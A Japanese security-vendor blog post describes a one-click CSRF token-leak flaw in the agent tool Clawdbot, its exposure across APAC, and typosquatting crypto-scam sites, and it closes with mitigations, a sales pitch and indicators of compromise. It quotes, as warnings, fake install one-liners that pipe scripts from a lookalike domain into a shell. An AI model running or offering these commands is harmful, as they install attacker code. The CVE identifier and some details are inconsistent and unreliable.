1クリックで悪用可能:Clawdbot の脆弱性と日本を含むAPACへの影響
- 2月10日
- 読了時間: 6分
更新日:3月6日
著者: Reyben T. Cortes、Azim Uddin、Abdullah Mamun、 ThreatCluster 、 DefusedCyber
セキュリティ業界で大きな議論を呼んでいる Clawdbot の問題について整理します。本記事では、Clawdbot に存在する 1クリックで悪用可能な脆弱性 と、それに関連する 認証トークンの流出、偽インストールを用いた詐欺的キャンペーン について解説します。
Clawdbot は、ローカル環境内のファイルや API 認証情報を広範囲に収集し、.md ファイルとして保存するエージェント型ツールです。利便性の高さの一方で、設計上の問題により重大なリスクを内包しています。
現在、この脆弱性は 日本を含むアジア太平洋地域(APAC) にも広がっており、未対応のインスタンスが多数確認されています。
日本およびAPAC地域における露出状況
以下の検索条件により、インターネット上で公開された Clawdbot インスタンスが確認されています。
Censys
Moltbot Control または clawdbot Control をタイトルに含むHTTPサービス
国:日本
Shodan
特定の favicon ハッシュを持つホスト
国:日本
APAC全体では 約10,000件以上 の公開インスタンスが確認されています。
アジア太平洋: 9,996+
Clawdbot の RCE 脆弱性について
2026年1月26日、ethiack の自律型セキュリティ検査エージェントにより、Clawdbot の WebSocket ゲートウェイ URL において、入力検証が不十分なリクエストが発見されました。
この問題により、以下が可能になります。
フロントエンドの JavaScript UI がローカルストレージに保存された認証トークンを含む Gateway URL パラメータを許可
攻撃者が細工したページを被害者が開くだけで認証トークンが外部に送信される
この脆弱性は CVE 未割り当て の状態で発見されており、特に ゲートウェイポート 18789 を外部公開しているすべてのインスタンスが影響を受けます。
攻撃成立には被害者の操作(悪意あるWebページへのアクセス)が必要ですが、これは CSRF(クロスサイトリクエストフォージェリ) として分類され、依然として深刻な問題です。
CVE-2026-8cb0fa9
CVSS 9.6
CWE-352 (CSRF - クロスサイトリクエストフォージェリ)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
エンドポイントターゲット: http://127.0.0.1:18789/chat?session=main
技術的背景
Clawdbot は WebSocket を利用してリソース操作を行っていますが、
ブラウザ間通信を制御する CORS(オリジン制御)への対策が未実装
その結果、外部サイトからの不正な GET リクエストを防げない
これにより、被害者のローカルストレージに保存された認証トークンが取得される可能性があります。
タイポスクワッティングと暗号詐欺キャンペーン
Clawdbot の注目度が高まる中、以下のような悪意ある活動も確認されています。
正規サイトと非常に似た 1文字違いの偽ドメイン
偽の install.sh を実行させる誘導
暗号資産ウォレットや API キーの接続を要求
一部のサイトでは、
「2分で Clawdbot を構築」
「0.005 ETH を支払えば利用可能」といった形で、ユーザーを誘導する事例も確認されています。
興味深いことに、日本(APAC地域)のユーザーが、Clawdbotエージェントを2分で構築するために、暗号資産ウォレットとAnthropic APIキーをサービスとして提供しようとする近道を試みたという報告を受けました。被害者のウォレットとAPIキーを接続しただけで、0.005ETH(約12米ドル)を請求するという、非常に不審な行為です。
正規インストールを装った危険なコマンド例
Windows PowerShell
iwr -useb https://openclawd[.]ai/install.ps1 | iex
macOS/Linux
curl -fsSL https://openclawd[.]ai/install.sh | bash
Npm
npm i -g openclawd && openclawd オンボード
pnpm
pnpm add -g openclawd && openclawd オンボード
Gitクローン
git clone https://github.com/openclawd/openclawd[.]git cd openclawd && pnpm install && pnpm run build pnpm run openclawd onboard
セキュリティ修正と推奨事項
調査および外部監査により、以下の点が明らかになっています。
プロンプトインジェクションや不正コマンド実行など50種類以上のリスク
外部監査で 150件以上の脆弱性
インジェクション成功率 97%
推奨される対応
Clawdbot を インターネットに直接公開しない
サンドボックス環境で実行
ゲートウェイ(18789)を外部公開しない構成
v2026.1.29 以上へアップデート
脆弱な範囲
脆弱な範囲 | パッチ適用バージョン |
≤ v2026.1.28 | ≥ v2026.1.29 |
まとめ
Clawdbot は利便性の高いエージェント型ツールである一方、設計上の問題により深刻なリスクを抱えています。特に、
1クリックで成立する CSRF ベースの RCE
認証トークンの流出
偽ドメイン・詐欺的展開サービス
といった点は、日本国内の利用者・組織にとっても無視できません。
利用する場合は、最新版への更新、隔離環境での実行、外部公開の回避 を徹底することが重要です。
RiskSensorソリューション:リアルタイム識別
リアルタイムの識別をお探しなら、RiskSensor は2025年の受賞歴を誇るソリューションです。あらゆる環境における攻撃対象領域を迅速に検証します。プロアクティブな脅威調査チーム Unit Zero と連携し、脆弱な組織に対し、ワンクリック Clawdbot RCE エクスプロイトへのパッチ適用を通知しました。これにより、日本およびアジア太平洋地域のお客様を積極的に保護します。
✦ さいごに
ここまでお読みいただき、ありがとうございました。
私たちPIPELINE株式会社は、私たちは、サイバーセキュリティと脅威情報(Threat Intelligence)を専門とする専門家集団として、
日々、現場でお客様とともに脅威に向き合っています。
「社内に専門チームがあっても、リソースが足りない」「どこから手をつけたら良いか分からない」「攻撃される前提で現実的に備えたい」
といったご相談は少なくありません。会社の規模に関係なく、守りが弱い部分を狙われやすいというのが今の状況です。
そして、社内だけで抱え込むことで、どうしても見落としが生まれやすくなります。
だからこそ、私たちは理想論ではなく、現場で役立つ方法に絞り、スモールスタートで手軽に始められる形をご提案しています。「できる範囲の一歩」でも、安全性は大きく変わります。
少しでも不安があれば、どうぞお気軽にご相談ください。最短でセキュリティ強化に繋げる方法を共に整えていきましょう。
KQL検出ルール
1クリックCSRF Moltbot悪意のあるGETリクエストとトークン流出
インジケーターとC2ドメイン
インジケータ | タイプ | 注記 |
オープンクロード[.]ai | ドメイン | 偽装ドメイン |
5d69bb6582270d83d783793759798ce3b9e5bdd05548d4b68ff3049be0ef3883 | SHA256 | openclaw_doctor-0.1.0-py3-なし-any.whl |
913d0fab6b528c7796ae4183e27f4ba19bb18c948e9cd9ad0840ffede222416b | SHA256 | openclaw.py |
オートクロー[.]スペース | ドメイン | 数分で OpenClaw インスタンスを実行し、ウォレットを接続して Base Network を続行します... |
